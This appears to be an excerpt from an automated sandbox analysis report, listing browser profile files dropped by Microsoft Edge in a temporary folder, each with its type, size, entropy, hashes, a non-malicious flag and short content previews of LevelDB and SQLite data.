                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.245236430969773
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaPv+q1923fQyS/UaVdg2KLlmahIq2P923fQyS/UaPrqIFUv:OfzLqv4s3FUv
                                                                                                                                                                                                                                                                                                              MD5:1CF53904790DF8F47501A6BF9BF6B098
                                                                                                                                                                                                                                                                                                              SHA1:9BEA2853D2BB93DD5A6A9EA453CDE3F9A3585993
                                                                                                                                                                                                                                                                                                              SHA-256:8114CE471BD78B72A3EB5E938F0F3194EEDF3D8C88491C45DE63FBD4943E7D47
                                                                                                                                                                                                                                                                                                              SHA-512:2F8D7C1A74C801DF5055BB608037C47BB8667C730C28A78D93EC4BF3FC58889759808D2E9E2ED0563DC12F83C4CDECA855929584AF161ABECFA227DF78D01680
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.814 cd0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules since it was missing..2024/12/22-17:54:52.834 cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                              MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                                                                                                                                                                                                                              SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                                                                                                                                                                                                                              SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                                                                                                                                                                                                                              SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):269
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.239133776021477
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kaMFwq1923fQyS/U6FB2KLlmapOq2P923fQyS/U65IFUv:sFwfsFFLBOv4sWFUv
                                                                                                                                                                                                                                                                                                              MD5:220F56C4DE61B580B49D29DEFE784F57
                                                                                                                                                                                                                                                                                                              SHA1:041C761E1515EE5944802523FCD726FB0D5A9BAB
                                                                                                                                                                                                                                                                                                              SHA-256:0A01BAF66B11E66CE95AC1E39CE7FA5EE681E25205442BC0A70A2B5BACD0DFB8
                                                                                                                                                                                                                                                                                                              SHA-512:ACA3880D3230B70C64E989E339C8B90C5F91B4F15BEA6B5DB65A4D1785A8C68933929D6912FA0ED37C77238871DF3F595C8C54EEF5A16DC8AA2CCB0A55304CE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:52.943 cd0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts since it was missing..2024/12/22-17:54:52.959 cd0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6975083372685086
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                                                                                                                                                                                                                              MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                                                                                                                                                                                                                              SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                                                                                                                                                                                                                              SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                                                                                                                                                                                                                              SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNl+4X:Ls35
                                                                                                                                                                                                                                                                                                              MD5:DC3F9CFD69BB88DB9758BB56DB153F84
                                                                                                                                                                                                                                                                                                              SHA1:9618BCC12A783821446774F09145201C3A004DF2
                                                                                                                                                                                                                                                                                                              SHA-256:B7722DD6575F51964265EF805872697774EDE6B32DA57E47ACF8DD0D41A3A24B
                                                                                                                                                                                                                                                                                                              SHA-512:CBD175FA80D63A922AB2FF4A9F54A2A9722CE210388423E2F7B407CF945B436FE6DB496DF2335A47872DA2D21DE30F2F1312B9C975CCA9B199AE08233378172F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.33890226319329847
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                                                                                                                                                                                              MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                                                                                                                                                                                              SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                                                                                                                                                                                              SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                                                                                                                                                                                              SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.294848678262975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kNcs1923fQyS/0a2jM8B2KLlmi+q2P923fQyS/0a2jMGIFUv:XBhjFLwv4hEFUv
                                                                                                                                                                                                                                                                                                              MD5:924BABD7144617DBB263D562232680B5
                                                                                                                                                                                                                                                                                                              SHA1:BCDEA1CD3C83D0C4D853C1049496419AF2B77C59
                                                                                                                                                                                                                                                                                                              SHA-256:BD47B1E4647EC45C5C6A6863867D22465F050CE55CD4B78A4683B7F0BB746DAA
                                                                                                                                                                                                                                                                                                              SHA-512:D7C8529B2B3A1D2D5642027BE6764841C72348BC982F3069BF9D42CEAC574E35A6B10E74CA9B0533AE418DB3DC2FDBEA6727FA021DEE974F7E05358CB4FE4654
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.731 1b48 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb since it was missing..2024/12/22-17:54:53.879 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
